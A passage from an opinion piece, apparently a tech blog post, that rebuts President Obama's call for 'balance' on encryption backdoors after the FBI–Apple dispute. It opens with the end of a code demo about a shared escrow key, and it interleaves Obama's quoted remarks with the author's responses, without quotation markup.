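assert leaked == secrets_list
```

The per-user keys never leak, and it doesn't matter: the whole system is only as strong as the one key everyone is forced to share. That is the "vulnerability you're required to keep open" that the crypto community keeps warning about.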
So the question now becomes that, we as a society, setting aside the specific case between the FBI and Apple, setting aside the commercial interests, the concerns about what could the Chinese government do with this, even if we trust the US government. Setting aside all those questions, we're going to have to make some decisions about how do we balance these respective risks. And I've got a bunch of smart people, sitting there, talking about it, thinking about it. We have engaged the tech community, aggressively, to help solve this problem. My conclusions so far is that you cannot take an absolutist view on this. So if your argument is "strong encryption no matter what, and we can and should in fact create black boxes," that, I think, does not strike the kind of balance that we have lived with for 200, 300 years. And it's fetishizing our phones above every other value. And that can't be the right answer.
This is not an absolutist view. It is not an absolutist view to say that anything you do to weaken the security of phones creates disastrous consequences for overall security, far beyond the privacy of individuals holding those phones. And, as Julian Sanchez rightly notes, it's ridiculous that it's the status quo on the previous compromise that is now being framed as an "absolutist" position:
CALEA--with obligations on telecoms to assist, but user-side encryption protected--WAS the compromise. Now that's "absolutism".
Also, the idea that this is about "fetishizing our phones" is ridiculous. No one is even remotely suggesting that. No one is even suggesting -- as Obama hints -- that this is about making phones "above and beyond" what other situations are. It's entirely about the nature of computer security and how it works. It's about the risks to our security in creating deliberate vulnerabilities in our technologies. To frame that as "fetishizing our phones" is insulting.
There's a reason why the NSA didn't want President Obama to carry a Blackberry when he first became President. And there's a reason the President wanted a secure Blackberry. And it's not because of fetishism in any way, shape or form. It's because securing data on phones is freaking hard and it's a constant battle. And anything that weakens the security puts people in harm's way.
I suspect that the answer is going to come down to how do we create a system where the encryption is as strong as possible. The key is as secure as possible. It is accessible by the smallest number of people possible for a subset of issues that we agree are important. How we design that is not something that I have the expertise to do. I am way on the civil liberties side of this thing. Bill McRaven will tell you that I anguish a lot over the decisions we make over how to keep this country safe. And I am not interested in overthrowing the values that have made us an exceptional and great nation, simply for expediency. But the dangers are real. Maintaining law and order and a civilized society is important. Protecting our kids is important.
You suspect wrong. Because while your position sounds reasonable and "balanced" (and I've seen some in the press describe President Obama's position here as "realist"), it's actually dangerous. This is the problem. The President is discussing this like it's a political issue rather than a technological/math issue. People aren't angry about this because they're "extremists" or "absolutists" or people who "don't want to compromise." They're screaming about this because "the compromise" solution is dangerous. If there really were a way to have strong encryption with a secure key where only a small number of people could get in on key issues, then that would be great.
But the key point that all of the experts keep stressing is: that's not reality. So, no, the President's not being a "realist." He's being the opposite.
So I would just caution against taking an absolutist perspective on this. Because we make compromises all the time. I haven't flown commercial in a while, but my understanding is that it's not great fun going through security. But we make the concession because -- it's a big intrusion on our privacy -- but we recognize that it is important. We have stops for drunk drivers. It's an intrusion. But we think it's the right thing to do. And this notion that somehow our data is different and can be walled off from those other trade-offs we make, I believe is incorrect.
Again, this is not about "making compromises" or some sort of political perspective. And the people arguing for strong encryption aren't being "absolutist" about it because they're unwilling to compromise. They're saying that the "compromise" solution means undermining the very basis of how we do security and putting everyone at much greater risk. That's ethically horrific.
And, also, no one is saying that "data is different." There has always been information that is "walled off." What people are saying is that one consequence of strong encryption is that it has to mean that law enforcement is kept out of that information too. That does not mean they can't solve crimes in other ways. It does not mean that they don't get access to lots and lots of other information. It just means that this kind of content is harder to access, because we need it to be harder to access to protect everyone.
It's not security v. privacy. It's security v. security, where the security the FBI is fighting for is to stop the 1 in a billion attack and the security everyone else wants is to prevent much more likely and potentially much more devastating attacks.
Meanwhile, of all the things for the President to cite as an analogy, TSA security theater may be the worst. Very few people think it's okay, especially since it's been shown to be a joke. Setting that up as the precedent for breaking strong encryption is... crazy. And, on top of that, using the combination of TSA security and DUI checkpoints as evidence for why we should break strong encryption with backdoors again fails to recognize the issue at hand. Neither of those undermine an entire security setup.
We do have to make sure, given the power of the internet and how much our lives are digitalized, that it is narrow and that it is constrained and that there's oversight. And I'm confident this is something that we can solve, but we're going to need the tech community, software designers, people who care deeply about this stuff, to help us solve it. Because what will happen is, if everybody goes to their respective corners, and the tech community says "you know what, either we have strong perfect encryption, or else it's Big Brother and Orwellian world," what you'll find is that after something really bad happens, the politics of this will swing and it will become sloppy and rushed and it will go through Congress in ways that have not been thought through. And then you really will have dangers to our civil liberties, because the people who understand this best, and who care most about privacy and civil liberties have disengaged, or have taken a position that is not sustainable for the general public as a whole over time.
I have a lot of trouble with the President's line about everyone going to "their respective corners," as it suggests a ridiculous sort of tribalism in which the natural state is the tech industry against the government and even suggests that the tech industry doesn't care about stopping terrorism or child pornographers. That, of course, is ridiculous. It's got nothing to do with "our team." It has to do with the simple realities of encryption and the fact that what the President is suggesting is dangerous.
Furthermore, it's not necessarily the "Orwellian/big brother" issue that people are afraid of. That's a red herring from the "privacy v. security" mindset. People are afraid of this making everyone a lot less safe. No doubt, the President is right that if "something really bad" happens, the politics will move in one direction -- but it's pretty ridiculous for him to say so when the latest skirmish in this battle is being fought by his very own Justice Department, and he's the one who jumped on the San Bernardino attacks as an excuse to push this line of argument.
If the President is truly worried about stupid knee-jerk reactions following "something bad" happening, rather than trying to talk about "balance" and "compromise," he could and should be doing more to fairly educate the American public, and to make public statements about this issue and how important strong encryption is. Enough of this bogus "strong encryption is important, but... the children" crap. The children need strong encryption. The victims of crimes need encryption. The victims of terrorists need encryption. Undermining all that because just a tiny bit of information is inaccessible to law enforcement is crazy. It's giving up the entire ballgame to those with malicious intent, just so that we can have a bit more information in a few narrow cases.
President Obama keeps mentioning trade-offs, but it appears that he refuses to actually understand the trade-offs at issue here. Giving up on strong encryption is not about finding a happy middle compromise. Giving up on strong encryption is putting everyone at serious risk.